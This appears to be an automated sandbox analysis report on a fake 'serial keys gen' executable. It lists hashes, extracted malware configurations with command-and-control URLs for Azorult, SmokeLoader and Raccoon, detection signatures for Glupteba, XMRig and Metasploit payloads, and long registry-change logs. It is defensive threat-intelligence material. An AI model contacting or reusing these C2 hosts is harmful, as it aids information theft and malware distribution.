Analysis
-
max time kernel
30s -
max time network
301s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-04-2021 11:04
Static task
static1
Behavioral task
behavioral1
Sample
Delphi_Wmi_Class_Generator_serial_keys_gen.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Delphi_Wmi_Class_Generator_serial_keys_gen.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Delphi_Wmi_Class_Generator_serial_keys_gen.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Delphi_Wmi_Class_Generator_serial_keys_gen.exe
Resource
win10v20201028
General
-
Target
Delphi_Wmi_Class_Generator_serial_keys_gen.exe
-
Size
5.4MB
-
MD5
3b024ffc1fdf4ef5bc78fe48d0feb1a0
-
SHA1
859b62beef8bc1e7495a6d063d309586163869db
-
SHA256
4ff87821343d06ad2d65b085c487f825ca876e368c9367ad57a3d243c2633c81
-
SHA512
e68746f8a3ba67d83447be76372438512026fe698e5547d310b38f6e8e9d52f2e03492fb66e5687cd969032bcec9fda80dd45dedf0a40f0de7ad1b7d1cec0416
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/5852-212-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/5852-219-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/5852-213-0x0000000002690000-0x0000000002F9A000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral2/memory/5756-203-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/5756-202-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/5756-209-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/5756-237-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 11 IoCs
pid Process 416 keygen-pr.exe 564 keygen-step-1.exe 804 keygen-step-3.exe 400 keygen-step-4.exe 4396 key.exe 4492 Setup.exe 2252 key.exe 4536 multitimer.exe 4676 setups.exe 192 setups.tmp 200 askinstall20.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 192 setups.tmp 192 setups.tmp 192 setups.tmp 192 setups.tmp 192 setups.tmp 192 setups.tmp 192 setups.tmp -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral2/memory/1500-829-0x0000000007A70000-0x0000000007A91000-memory.dmp agile_net -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 245 api.ipify.org 322 ipinfo.io 333 ipinfo.io 356 ip-api.com 89 api.ipify.org 133 ipinfo.io 142 ipinfo.io 209 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4396 set thread context of 2252 4396 key.exe 87 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 12 IoCs
pid pid_target Process procid_target 6012 4436 WerFault.exe 118 6832 5396 WerFault.exe 152 7904 5396 WerFault.exe 152 8176 5396 WerFault.exe 152 5140 5396 WerFault.exe 152 5500 5396 WerFault.exe 152 7600 5396 WerFault.exe 152 6480 5396 WerFault.exe 152 4424 5396 WerFault.exe 152 5552 5396 WerFault.exe 152 6468 5396 WerFault.exe 152 7368 5836 WerFault.exe 148 -
Delays execution with timeout.exe 3 IoCs
pid Process 8100 timeout.exe 5768 timeout.exe 6272 timeout.exe -
Kills process with taskkill 6 IoCs
pid Process 5640 taskkill.exe 5016 taskkill.exe 5132 taskkill.exe 7700 taskkill.exe 7696 taskkill.exe 2112 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main cmd.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{C3F59FEA-92E6-4866-BB0A-B2D62E7634BA}" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000ffbbdbfec726809569c244be705b5150774cccbd6b4569f084f698f5300f66a426419a5c4c371ba7d7b06feb4c44199f5f87ee7d074a7bf25e81 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000f55a2cb0e5a1a9c89348d69a7edf52f64d7805bfea99e49f0a7112a7ec371744a6ffbd051a5339a70c55e6c2435ba71a8225a6d1f431acf284c9a1f687cd3fcbf25d902a12d95bba26e2d0eec8539a96345c28bc492e94eb6af33355f0f0f16fef14fc26f9547287ce9065c316e9edee81bb86a840b0eef2038eebe2bac020c695c4f95704e52b9eb7ff9e709e3bd236e9e36f5e08d77ba1c239c1fea55d6b3c7c0d12e902aafc38a4cf6071106b3b936275b0c495c25b44609600b78ee7b3b9528fb1d8b9c4e12630a1aaa1c8971a89f80fe4efde9344b4d6435e4ee37ee01f7ceaf88e9e53e5086d135bab73e1a320605395bd6069e175a3e297cada42869035bee30424782fde57c617d0ca672fd2f9dfaf071264a4326412e09b9553698533abdb7a0551aae2185a9071254b1d4a9c548f5e83a3cd799272fa4a89d186b73a51abbd89ff50b7d46fcf89afabb6f73a538d59ec48c0d6e9a4c23d81dcdcdccb4f81ffb3a280e182a5d0362da9a76ca47ac476e5726f353147dd8a88948e28a647e63c315b6c99949cb056a3633c902b6b92854641619591ae58a94135aae0cbef4314bf2c MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{55875D48-1D95-46FB-8573-32343E8CE816} = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000000ae63a66a494ae24ecb485af47d01994ea090190f8b890b4d997817e3f377fb813a505478f77249a04ac21480e0aaf1d19fba43c1504e402d355adfd821d4bc26e91143f77d3c16c6a386bb0cef34466a81817349deb29825b5c MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = fc757cc57928d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f1594830216